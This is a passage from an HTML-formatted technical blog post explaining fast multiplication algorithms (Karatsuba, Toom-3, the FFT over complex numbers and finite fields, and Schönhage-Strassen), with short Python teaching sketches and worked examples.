&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;——————————&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      2468  ( = 1234 ×   2)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     6170   ( = 1234 ×  50)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1234    ( = 1234 × 100)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;——————————&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    187568&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This algorithm has complexity $\mathcal{O}(n^2)$, where $n$ is the number of digits. In 1960, Kolmogorov speculated that this represented the asymptotic bound for multiplication (that is, multiplication of two numbers could not take less than $\mathcal{O}(n^2)$ operations). He gave a lecture on the topic and one of the students, Karatsuba, then 23 years old, came up with a solution that runs in $\mathcal{O}(n^{\log_2(3)})$, thus disproving Kolmogorov’s conjecture. The basic idea of Karatsuba’s algorithm is the following: say we want to multiply $x$ and $y$; we can break them into smaller numbers:&lt;br &#x2F;&gt;
$x=x_1\times 10^m +x_0$&lt;br &#x2F;&gt;
$y=y_1\times 10^m +y_0$&lt;br &#x2F;&gt;
where both $x_0$ and $y_0$ are numbers less than $10^m$. The product $x\times y$ is simply:&lt;br &#x2F;&gt;
$x\times y=x_1\times y_1\times 10^{2m}+(x_1\times y_0+y_1\times x_0)\times 10^m+x_0\times y_0$&lt;br &#x2F;&gt;
Karatsuba found that $x_1y_0+y_1x_0$ can be calculated efficiently at the expense of some additions:&lt;br &#x2F;&gt;
$x_1\times y_0+y_1\times x_0=(x_1+x_0)\times (y_1+y_0)-x_1\times y_1-x_0\times y_0$.&lt;br &#x2F;&gt;
Even if there are some extra calculations, these operate over smaller numbers, resulting in an overall smaller cost for large numbers.&lt;&#x2F;p&gt;
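&lt;p&gt;A minimal Python sketch of Karatsuba’s recursion (base-10 splitting, single-digit base case) looks like this:&lt;&#x2F;p&gt;

```python
def karatsuba(x: int, y: int) -> int:
    """Multiply two non-negative integers with Karatsuba's recursion.

    Three recursive multiplications of half-size numbers instead of four
    give the O(n^log2(3)) ~ O(n^1.58) running time.
    """
    if x < 10 or y < 10:  # base case: a single-digit factor
        return x * y
    m = max(len(str(x)), len(str(y))) // 2
    base = 10 ** m
    x1, x0 = divmod(x, base)  # x = x1*10^m + x0
    y1, y0 = divmod(y, base)  # y = y1*10^m + y0
    a = karatsuba(x1, y1)                    # x1*y1
    c = karatsuba(x0, y0)                    # x0*y0
    b = karatsuba(x1 + x0, y1 + y0) - a - c  # x1*y0 + x0*y1, one multiplication
    return a * base ** 2 + b * base + c

assert karatsuba(1234, 152) == 187568
```

The splitting point $m$ and base-10 representation are chosen for readability; real implementations split on machine words.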
&lt;h2 id=&quot;toom-cook-algorithm&quot;&gt;Toom-Cook algorithm&lt;&#x2F;h2&gt;
&lt;p&gt;The divide and conquer strategy can be taken further, leading to a reduction in the complexity of the multiplication algorithm. Toom and Cook developed several methods (known as Toom-X, X being a number), which consist of the following stages:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Splitting&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Evaluation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Pointwise multiplication&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Interpolation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Recomposition&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Several variants of the algorithms are implemented in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gmplib.org&#x2F;&quot;&gt;GNU Multiple Precision Arithmetic Library&lt;&#x2F;a&gt;. Toom-2 is the same as Karatsuba’s algorithm. Toom-X begins by splitting the numbers $x$ and $y$ in X parts of equal length(1) and these are treated as the coefficients of some polynomial (we focus on Toom-3, but you can see more details &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gmplib.org&#x2F;manual&#x2F;Toom-4_002dWay-Multiplication&quot;&gt;here&lt;&#x2F;a&gt;)(2):&lt;br &#x2F;&gt;
$x(t)=x_2 t^2+x_1 t+x_0$&lt;br &#x2F;&gt;
$y(t)=y_2 t^2+y_1 t+y_0$&lt;br &#x2F;&gt;
If we evaluate $x(t)$, $y(t)$ at $t=b$ (the base used for the splitting), we get the numbers back. The product of both numbers corresponds to a polynomial of degree $2(X-1)$; for Toom-3,&lt;br &#x2F;&gt;
$w(t)=w_4t^4+w_3t^3+w_2t^2+w_1t+w_0$&lt;br &#x2F;&gt;
We can evaluate the polynomials at 5 different points, which will suffice to determine uniquely the polynomial $w$ due to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Polynomial_interpolation#Interpolation_theorem&quot;&gt;interpolation theorem&lt;&#x2F;a&gt;. We can choose 5 convenient points which make the evaluation and reconstruction of the polynomial easy. Common points are $0, 1, -1, 2$ and $\infty$ (this last one is just the product of the main coefficients). Let’s see the form of each value:&lt;br &#x2F;&gt;
$w(0)=x(0)y(0)=x_0y_0$&lt;br &#x2F;&gt;
$w(1)=x(1)y(1)=(x_0+x_1+x_2)(y_0+y_1+y_2)$&lt;br &#x2F;&gt;
$w(-1)=x(-1)y(-1)=(x_0-x_1+x_2)(y_0-y_1+y_2)$&lt;br &#x2F;&gt;
$w(2)=x(2)y(2)=(x_0+2x_1+4x_2)(y_0+2y_1+4y_2)$&lt;br &#x2F;&gt;
$w(\infty)=x(\infty)y(\infty)=x_2y_2$&lt;&#x2F;p&gt;
&lt;p&gt;If we look at things from $w$ and its coefficients, we get:&lt;br &#x2F;&gt;
$w(0)=w_0$&lt;br &#x2F;&gt;
$w(1)=w_4+w_3+w_2+w_1+w_0$&lt;br &#x2F;&gt;
$w(-1)=w_4-w_3+w_2-w_1+w_0$&lt;br &#x2F;&gt;
$w(2)=16w_4+8w_3+4w_2+2w_1+w_0$&lt;br &#x2F;&gt;
$w(\infty)=w_4$&lt;&#x2F;p&gt;
&lt;p&gt;This is just solving one linear system (where two of the coefficients, $w_0$ and $w_4$, are immediate). Once the coefficients are known, all that remains is to evaluate $w$ at $t=b$ and add. Toom-3 has a lower order ($\mathcal{O}(n^{\log(5)&#x2F;\log(3)})=\mathcal{O}(n^{1.46})$) than Karatsuba’s method ($\mathcal{O}(n^{1.58})$), so it runs faster for sufficiently large integers.&lt;&#x2F;p&gt;
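&lt;p&gt;The evaluation and interpolation steps can be sketched in Python for the polynomial part of Toom-3 (carry handling and the final recomposition at $t=b$ are omitted; the interpolation formulas below are obtained by solving the small linear system by hand):&lt;&#x2F;p&gt;

```python
def toom3_poly_mul(x, y):
    """Multiply x(t)=x0+x1*t+x2*t^2 by y(t) via evaluation at 0, 1, -1, 2, inf.

    Returns the coefficients (w0, ..., w4) of w(t) = x(t)*y(t).
    """
    x0, x1, x2 = x
    y0, y1, y2 = y
    # Evaluation (5 pointwise multiplications):
    w_at_0 = x0 * y0
    w_at_1 = (x0 + x1 + x2) * (y0 + y1 + y2)
    w_at_m1 = (x0 - x1 + x2) * (y0 - y1 + y2)
    w_at_2 = (x0 + 2 * x1 + 4 * x2) * (y0 + 2 * y1 + 4 * y2)
    w_at_inf = x2 * y2  # product of the leading coefficients
    # Interpolation (exact integer arithmetic; divisions leave no remainder):
    w0 = w_at_0
    w4 = w_at_inf
    w2 = (w_at_1 + w_at_m1) // 2 - w0 - w4    # even part of w(1)
    odd = (w_at_1 - w_at_m1) // 2             # w1 + w3
    # From w(2): 2*w1 + 8*w3 = w(2) - 16*w4 - 4*w2 - w0
    w3 = ((w_at_2 - 16 * w4 - 4 * w2 - w0) // 2 - odd) // 3
    w1 = odd - w3
    return (w0, w1, w2, w3, w4)

# (3 + 2t + t^2)(6 + 5t + 4t^2) = 18 + 27t + 28t^2 + 13t^3 + 4t^4
assert toom3_poly_mul((3, 2, 1), (6, 5, 4)) == (18, 27, 28, 13, 4)
```

Five multiplications of third-size pieces replace the nine of the schoolbook method, which is exactly where the $\log(5)/\log(3)$ exponent comes from.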
&lt;p&gt;For larger integers (in the order of 10,000 to 40,000 digits), we can go faster by means of the Schönhage-Strassen algorithm, which uses the fast Fourier transform (FFT) to achieve a complexity $\mathcal{O}(n\log(n)\log\log(n))$. Before we can explain the algorithm, we need to introduce the FFT. The order can be further reduced to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hal.archives-ouvertes.fr&#x2F;hal-02070778&#x2F;document&quot;&gt;$\mathcal{O}(n\log(n))$&lt;&#x2F;a&gt;, but this algorithm is only practical for (super-ultra) incredibly large numbers and is an example of a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Galactic_algorithm&quot;&gt;galactic algorithm&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-fast-fourier-transform&quot;&gt;The Fast-Fourier Transform&lt;&#x2F;h2&gt;
&lt;p&gt;The FFT is one of the key building blocks of many important algorithms, such as fast multiplication of very large numbers, polynomial multiplication, solving finite difference equations, error correcting codes (Reed-Solomon codes), and digital signal processing. It was used by Gauss early in the 19th century when he was trying to interpolate the orbits of asteroids Pallas and Juno. A simple implementation requires $\mathcal{O}(n^2)$ operations. In 1965, Cooley and Tukey realized that the algorithm could be implemented more efficiently, reducing it to $\mathcal{O}(n\log(n))$, which led to its widespread use. Almost every language and numerical computation library has an implementation. In Rust, you can check this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.rs&#x2F;GSL&#x2F;latest&#x2F;rgsl&#x2F;fft&#x2F;index.html&quot;&gt;link&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;To get an idea of the huge improvement over the naïve algorithm, let’s look at the number of calculations for different samples:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Number of samples&lt;&#x2F;th&gt;&lt;th&gt;$10^3$&lt;&#x2F;th&gt;&lt;th&gt;$10^6$&lt;&#x2F;th&gt;&lt;th&gt;$10^{12}$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;DFT operations&lt;&#x2F;td&gt;&lt;td&gt;$10^6$&lt;&#x2F;td&gt;&lt;td&gt;$10^{12}$&lt;&#x2F;td&gt;&lt;td&gt;$10^{24}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;FFT operations&lt;&#x2F;td&gt;&lt;td&gt;$10^4$&lt;&#x2F;td&gt;&lt;td&gt;$2\times10^{7}$&lt;&#x2F;td&gt;&lt;td&gt;$4\times10^{13}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;We see that the number of computations is reduced by two or more orders of magnitude for samples with $1000$ or more elements!&lt;&#x2F;p&gt;
&lt;h3 id=&quot;fft-over-complex-numbers&quot;&gt;FFT over complex numbers&lt;&#x2F;h3&gt;
&lt;p&gt;The Fourier transform maps a function from its original domain (space or time) to another function depending on the (space or time) frequency. Stated another way, it decomposes a function into a collection of sine waves with different frequencies and amplitudes, which are useful to analyze the behavior of a given system. We can also perform the inversion, adding all those waves to recover the original function. Even though (continuous) Fourier transforms have many applications, we will be interested in discrete Fourier transforms (DFT), where we have a finite collection of data. Given data $x_0$, $x_1$,…$x_{N-1}$, the DFT gives a sequence $X_0, X_1,…X_{N-1}$, where&lt;br &#x2F;&gt;
$X_j=\sum_{k=0}^{N-1} x_k\exp(-2\pi i jk&#x2F;N)$&lt;br &#x2F;&gt;
where $i^2=-1$ is the imaginary unit. Inversion of the DFT is given by&lt;br &#x2F;&gt;
$x_j=\frac{1}{N}\sum_{k=0}^{N-1} X_k\exp(2\pi i jk&#x2F;N)$.&lt;&#x2F;p&gt;
&lt;p&gt;The DFT can be cast in the form of a matrix-vector product, $X=Mx$, where $M$ is the $N\times N$ DFT matrix:&lt;br &#x2F;&gt;
$M_{ij}=\omega^{(i-1)\times (j-1)}$&lt;br &#x2F;&gt;
where $\omega=\exp(-2\pi i&#x2F;N)$ and the indices $i$ and $j$ (not to be confused here with the imaginary unit) take the values $1,2,3,…,N$.&lt;&#x2F;p&gt;
&lt;p&gt;Implemented this way, the DFT requires $N^2$ operations, resulting from vector-matrix multiplication. The FFT will make this calculation more efficient, by taking advantage of the structure and using a divide and conquer strategy.&lt;&#x2F;p&gt;
&lt;p&gt;We can also see the DFT as evaluating a polynomial with coefficients $x_k$ over the roots of unity. This will be useful when discussing fast polynomial multiplication.&lt;&#x2F;p&gt;
&lt;p&gt;The key point is that computing the DFT with $N$ points can be reduced to calculating two DFTs with $N&#x2F;2$ points. We can apply this recursively to break down a very large problem into a collection of smaller and easier-to-solve subproblems and then recombine those results to get the DFT.&lt;&#x2F;p&gt;
&lt;p&gt;The algorithm also takes advantage of the properties of the $n$-th roots of unity in the complex plane. A number $z$ is known as an $n$-root of unity if $z^n=1$. These are of the form&lt;br &#x2F;&gt;
$z_k=\exp(2\pi i k&#x2F;n)$ for $k=0,1,2,…,n-1$. An interesting point is that these roots come in conjugate pairs: for each root $r$ we have the corresponding $\bar{r}$ (as a matter of fact, they form a finite group of order $n$ under multiplication). For example, the fourth roots of unity are: $1, i, -1, -i$. It is easy to see which are the pairs.&lt;&#x2F;p&gt;
&lt;p&gt;To see how this works, suppose we have a vector $x=(x_0,x_1,x_2,…,x_{n-1})$ and we want to compute its DFT. We can split the sum into even- and odd-indexed terms:&lt;br &#x2F;&gt;
$X_j=\sum_{k=0}^{n&#x2F;2-1} x_{2k}\exp(-2\pi i j(2k)&#x2F;n)+\sum_{k=0}^{n&#x2F;2-1} x_{2k+1}\exp(-2\pi i j(2k+1)&#x2F;n)$&lt;br &#x2F;&gt;
We can rewrite the odd terms by taking out a factor of $\exp(-2\pi i j&#x2F;n)$,&lt;br &#x2F;&gt;
$X_j=\sum_{k=0}^{n&#x2F;2-1} x_{2k}\exp(-2\pi i j(2k)&#x2F;n)+\exp(-2\pi i j&#x2F;n)\sum_{k=0}^{n&#x2F;2-1} x_{2k+1}\exp(-2\pi i j(2k)&#x2F;n)$&lt;br &#x2F;&gt;
Rearranging the exponents by sending the factor of $2$ to the denominator,&lt;br &#x2F;&gt;
$X_j=\sum_{k=0}^{n&#x2F;2-1} x_{2k}\exp(-2\pi i jk&#x2F;(n&#x2F;2))+\exp(-2\pi i j&#x2F;n)\sum_{k=0}^{n&#x2F;2-1} x_{2k+1}\exp(-2\pi i jk&#x2F;(n&#x2F;2))$&lt;br &#x2F;&gt;
We now find that $\sum_{k=0}^{n&#x2F;2-1} x_{2k}\exp(-2\pi i jk&#x2F;(n&#x2F;2))$ is just the $j$-th component of the DFT of the even terms, which contains $n&#x2F;2$ points. Similarly, $\sum_{k=0}^{n&#x2F;2-1} x_{2k+1}\exp(-2\pi i jk&#x2F;(n&#x2F;2))$ is the DFT of the odd terms, containing $n&#x2F;2$ points; since these sub-DFTs are periodic in $j$ with period $n&#x2F;2$, the same values are reused for $j$ and $j+n&#x2F;2$. This way, we broke the $n$-point DFT into two smaller $n&#x2F;2$-point DFTs, which can be combined to yield the original one. Each of those $n&#x2F;2$-point DFTs can in turn be broken into two smaller ones, so we can recursively reduce the number of computations by working with smaller samples (and save ourselves the large matrix-vector product).&lt;&#x2F;p&gt;
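&lt;p&gt;This even&#x2F;odd recursion can be written directly as a short radix-2 FFT in Python (a teaching sketch, not an optimized implementation; the input length must be a power of two):&lt;&#x2F;p&gt;

```python
import cmath

def fft(x):
    """Recursive radix-2 Cooley-Tukey FFT (len(x) must be a power of two)."""
    n = len(x)
    if n == 1:
        return list(x)
    even = fft(x[0::2])  # n/2-point DFT of the even-indexed terms
    odd = fft(x[1::2])   # n/2-point DFT of the odd-indexed terms
    out = [0j] * n
    for j in range(n // 2):
        # Twiddle factor exp(-2*pi*i*j/n) multiplying the odd sub-DFT:
        t = cmath.exp(-2j * cmath.pi * j / n) * odd[j]
        out[j] = even[j] + t
        out[j + n // 2] = even[j] - t  # the sub-DFTs repeat with opposite sign
    return out
```

For instance, `fft([1, 2, 3, 4])` agrees with the direct $\mathcal{O}(n^2)$ evaluation of the DFT sum.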
&lt;h3 id=&quot;extending-the-fft-to-arbitrary-rings&quot;&gt;Extending the FFT to arbitrary rings&lt;&#x2F;h3&gt;
&lt;p&gt;FFT can be extended from complex or real numbers to arbitrary rings, such as integers or polynomials (check our &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;math survival kit&lt;&#x2F;a&gt;). In particular, we can use the number theoretic transform, which specializes the FFT to $\mathbb{Z}&#x2F;p\mathbb{Z}$, that is, the integers modulo $p$ (a prime number). Here we also have the $n$-th roots of unity, given by&lt;br &#x2F;&gt;
$\alpha^n\equiv 1 \pmod{p}$&lt;br &#x2F;&gt;
It is important that we restrict ourselves to prime moduli: in this case, the square roots of $1$ are just $1$ and $-1$. For example, if we take $p=5$, $1^2\equiv 1 \pmod{5}$ and, since $-1\equiv 4 \pmod{5}$, $4^2=16\equiv 1 \pmod{5}$. This is not true modulo $8$, since $1^2\equiv 3^2\equiv 5^2\equiv 7^2\equiv 1 \pmod{8}$ and we would have $4$ square roots!&lt;&#x2F;p&gt;
&lt;p&gt;The problem with using the FFT in finite fields is that we are not free to choose the domain and the field just as we please. We need to select a multiplicative subgroup of order $2^n$ (in other words, a group generated by an element $g$ of order $2^n$). For example, if we take $p=5$, we have a group of order $4=2^2$ which is generated by $2$: $\{2^1=2, 2^2=4, 2^3\equiv 3, 2^4\equiv 1 \pmod{5}\}$; it does not need to span all the elements of the field, though.&lt;&#x2F;p&gt;
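&lt;p&gt;Finding such a subgroup is easy to sketch for tiny primes: the helper below (our own naming, not a library function) searches for an element of order exactly $n$, with $n$ a power of two dividing $p-1$:&lt;&#x2F;p&gt;

```python
def root_of_unity_pow2(n: int, p: int) -> int:
    """Find a primitive n-th root of unity mod the prime p.

    n must be a power of two (>= 2) dividing p - 1. Brute force over
    candidate generators is fine for tiny teaching examples.
    """
    assert (p - 1) % n == 0
    for g in range(2, p):
        w = pow(g, (p - 1) // n, p)   # w^n = 1 by Fermat's little theorem
        if pow(w, n // 2, p) == p - 1:  # w^(n/2) = -1  =>  order exactly n
            return w
    raise ValueError("no root of unity found")

# p = 17: the multiplicative group has order 16, so an order-8 subgroup exists.
w = root_of_unity_pow2(8, 17)
powers = [pow(w, k, 17) for k in range(8)]
assert len(set(powers)) == 8  # the powers form a subgroup of order 8
```

With $p=17$ this returns $w=9$, whose powers $\{1,9,13,15,16,8,4,2\}$ are the order-8 subgroup an 8-point number theoretic transform would evaluate on.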
&lt;h2 id=&quot;fft-multiplication-algorithm&quot;&gt;FFT multiplication algorithm&lt;&#x2F;h2&gt;
&lt;p&gt;The algorithm follows the same line as Karatsuba’s and Toom’s:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Split&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Evaluation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Pointwise multiplication&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Interpolation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Combination&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The key difference lies in the use of the FFT to speed up calculations.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;polynomial-multiplication&quot;&gt;Polynomial multiplication&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s start with polynomial multiplication. Given two polynomials, $p(x)=p_d x^d+p_{d-1}x^{d-1}+…+p_0$ and $q(x)=q_d x^d+q_{d-1}x^{d-1}+…+q_0$, we want to find their product, $w(x)=p(x)q(x)$. The simplest algorithm would be to apply repeatedly the distributive property, perform the multiplications and rearrange everything. The product of two polynomials of degree $d$ is a polynomial of degree $2d$. We can see that this strategy involves operations of the order $\mathcal{O}(d^2)$, that is, operations grow quadratically with the degree of the polynomials involved. We can take advantage of the structure of the polynomials and the interpolation theorem. We have at least two forms to describe the same polynomial:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Giving the $d+1$ coefficients.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Specifying the value of the polynomial at exactly $d+1$ points(3).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;What are the advantages of the second option? That we get to choose the points freely and reduce the number of calculations. For example, if we have an even function, $f(x)=f(-x)$, we can evaluate fewer points. Similarly, if the function is odd, $f(-x)=-f(x)$, and we only have to change the sign to get the value at $-x$. So, choosing pairs $x$ and $-x$, we reduce the number of evaluations by half (except if we choose $0$, for example). We can split our polynomial into two polynomials: one collects the even-degree terms and the other the odd-degree ones:&lt;br &#x2F;&gt;
$p(x)=p_e(x)+xp_o(x)$.&lt;br &#x2F;&gt;
For example, if $p=x^5+3x^4+5x^3+2x^2+6x+3$, we split it:&lt;br &#x2F;&gt;
$p(x)=(3x^4+2x^2+3)+x(x^4+5x^2+6)$&lt;br &#x2F;&gt;
We have then:&lt;br &#x2F;&gt;
$p_e=(3x^4+2x^2+3)$ and $p_o=(x^4+5x^2+6)$, where both polynomials are even functions! This way, we easily see that:&lt;br &#x2F;&gt;
$p(-x)=p_e(x)-xp_o(x)$&lt;br &#x2F;&gt;
If we have pairs $(x_k,p(x_k))$ and $(x_k,q(x_k))$, the product polynomial evaluated at $x_k$ is $(x_k,p(x_k)q(x_k))$.&lt;&#x2F;p&gt;
&lt;p&gt;To determine the product polynomial, we need $2d+1$ points; taking advantage of the above strategy, we need fewer point evaluations. If we can convert easily from the coefficient form to point evaluations, perform the multiplications in that form, and then transform back to coefficient form, we can achieve a lower complexity. We can recursively break the polynomials $p_e(x^2)$ and $p_o(x^2)$ into smaller polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;We can choose as evaluation points the $n$-th roots of unity, which come in pairs: $\exp(2\pi i k&#x2F;n)$ with $k=0,1,2,…,n-1$. In other words, we can quickly calculate the DFT of the polynomials, multiply the evaluations pointwise, and invert the DFT once the product has been found. This leads to operations in the order $\mathcal{O}(d\log(d))$.&lt;&#x2F;p&gt;
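&lt;p&gt;Putting the pipeline together (evaluate at the roots of unity, multiply pointwise, interpolate back) gives a short sketch over the complex numbers; a production implementation would use an iterative FFT and handle rounding more carefully:&lt;&#x2F;p&gt;

```python
import cmath

def _fft(x, sign):
    """Radix-2 FFT; sign=-1 is the forward transform, sign=+1 the inverse
    (up to the 1/n factor, applied by the caller)."""
    n = len(x)
    if n == 1:
        return list(x)
    even = _fft(x[0::2], sign)
    odd = _fft(x[1::2], sign)
    out = [0j] * n
    for j in range(n // 2):
        t = cmath.exp(sign * 2j * cmath.pi * j / n) * odd[j]
        out[j] = even[j] + t
        out[j + n // 2] = even[j] - t
    return out

def poly_mul(p, q):
    """Multiply integer polynomials (coefficient lists, low degree first):
    evaluate at the roots of unity, multiply pointwise, interpolate back."""
    n = 1
    while n < len(p) + len(q) - 1:
        n *= 2  # pad to a power of two able to hold the product
    fp = _fft(list(p) + [0] * (n - len(p)), -1)
    fq = _fft(list(q) + [0] * (n - len(q)), -1)
    fw = [a * b for a, b in zip(fp, fq)]   # pointwise multiplication
    w = _fft(fw, +1)                       # inverse FFT, up to a factor n
    return [round((c / n).real) for c in w[: len(p) + len(q) - 1]]

# (3 + 2x + x^2)(6 + 5x + 4x^2) = 18 + 27x + 28x^2 + 13x^3 + 4x^4
assert poly_mul([3, 2, 1], [6, 5, 4]) == [18, 27, 28, 13, 4]
```

The final `round` undoes the small floating-point error; number theoretic transforms avoid it entirely by working modulo a prime.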
&lt;h3 id=&quot;integer-multiplication&quot;&gt;Integer multiplication&lt;&#x2F;h3&gt;
&lt;p&gt;To apply the FFT to integer multiplication, we need to transform our numbers to the coefficients of polynomials, perform the FFT multiplication and finally reconstruct the result. Overall this will take $\mathcal{O}(n\log(n)\log\log(n))$. There is a large overhead, which will make this algorithm practical only for very large integers. For example, if we want to multiply $3578$ and $2457$, we can define vectors $(8,7,5,3,0,0,0,0)$ and $(7,5,4,2,0,0,0,0)$, where we conveniently pad the numbers with zeros.&lt;&#x2F;p&gt;
&lt;p&gt;Typically, operations are performed modulo $2^N+1$, where $N$ is larger than the combined number of bits of the integers $x$ and $y$, to make sure that results never wrap around.&lt;&#x2F;p&gt;
&lt;p&gt;The Fourier transform has the advantage that an operation such as the convolution of $x$ and $y$ can be calculated from the product of the transforms $X$ and $Y$ and transforming back:&lt;br &#x2F;&gt;
$(x\ast y)_j=\sum_{k} x_k y_{j-k}=IFFT(FFT(x)\times FFT(y))_j$&lt;&#x2F;p&gt;
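&lt;p&gt;The digit-vector idea can be sketched as follows; here the convolution is computed naïvely for clarity, whereas Schönhage-Strassen replaces exactly this step with an FFT-based one:&lt;&#x2F;p&gt;

```python
def digits(n: int) -> list:
    """Least-significant-first decimal digits, e.g. 3578 -> [8, 7, 5, 3]."""
    return [int(d) for d in str(n)[::-1]]

def convolve(x, y):
    """Acyclic convolution of digit vectors: out[k] = sum of x[i]*y[j], i+j=k.
    This O(n^2) loop is the step an FFT would accelerate."""
    out = [0] * (len(x) + len(y) - 1)
    for i, xi in enumerate(x):
        for j, yj in enumerate(y):
            out[i + j] += xi * yj
    return out

def int_mul(a: int, b: int) -> int:
    """Multiply integers by convolving their digits, then propagating carries."""
    result, carry = 0, 0
    conv = convolve(digits(a), digits(b))
    for k, c in enumerate(conv):
        carry, digit = divmod(c + carry, 10)
        result += digit * 10 ** k
    return result + carry * 10 ** len(conv)

assert int_mul(3578, 2457) == 3578 * 2457
```

Note that the convolution entries can exceed one digit (e.g. $8\times 7=56$), which is why the carry propagation pass at the end is needed.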
&lt;p&gt;The Schönhage-Strassen algorithm makes use of the negacyclic convolution. Given vectors $x$ and $y$ of length $n$ and $r$ a $2n$-th (primitive) root of unity (that is, $r^{2n}\equiv 1 \pmod{p}$ and $r^k\not\equiv 1$ if $0&amp;lt;k&amp;lt;2n$), we can define the following weight vectors:&lt;br &#x2F;&gt;
$W_j=r^j$ for $0\leq j&amp;lt;n$&lt;br &#x2F;&gt;
$W_j^{-1}=r^{-j}$ for $0\leq j&amp;lt;n$&lt;br &#x2F;&gt;
The negacyclic convolution (NCC) of $x$ and $y$ can be computed as:&lt;br &#x2F;&gt;
$NCC(x,y)=W^{-1}IFFT(FFT(Wx)\times FFT(Wy))$&lt;&#x2F;p&gt;
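&lt;p&gt;The weighting trick can be checked numerically over the complex numbers: multiplying the inputs by $W_j=r^j$ turns a cyclic convolution into a negacyclic one (the cyclic convolution in the middle is computed naïvely here; the FFT is what would accelerate that step):&lt;&#x2F;p&gt;

```python
import cmath

def negacyclic_direct(x, y):
    """Direct negacyclic convolution: wrap-around terms pick up a minus sign."""
    n = len(x)
    out = [0] * n
    for i in range(n):
        for j in range(n):
            if i + j < n:
                out[i + j] += x[i] * y[j]
            else:
                out[(i + j) % n] -= x[i] * y[j]
    return out

def negacyclic_weighted(x, y):
    """Same result via the weight vector W_j = r^j, with r a primitive 2n-th
    root of unity (so r^n = -1): weight, cyclic-convolve, unweight."""
    n = len(x)
    r = cmath.exp(1j * cmath.pi / n)  # r^n = -1
    wx = [r ** j * v for j, v in enumerate(x)]
    wy = [r ** j * v for j, v in enumerate(y)]
    cyc = [0j] * n
    for i in range(n):  # naive cyclic convolution of the weighted vectors
        for j in range(n):
            cyc[(i + j) % n] += wx[i] * wy[j]
    return [round((r ** -k * c).real) for k, c in enumerate(cyc)]

xs, ys = [1, 2, 3, 4], [5, 6, 7, 8]
assert negacyclic_weighted(xs, ys) == negacyclic_direct(xs, ys)
```

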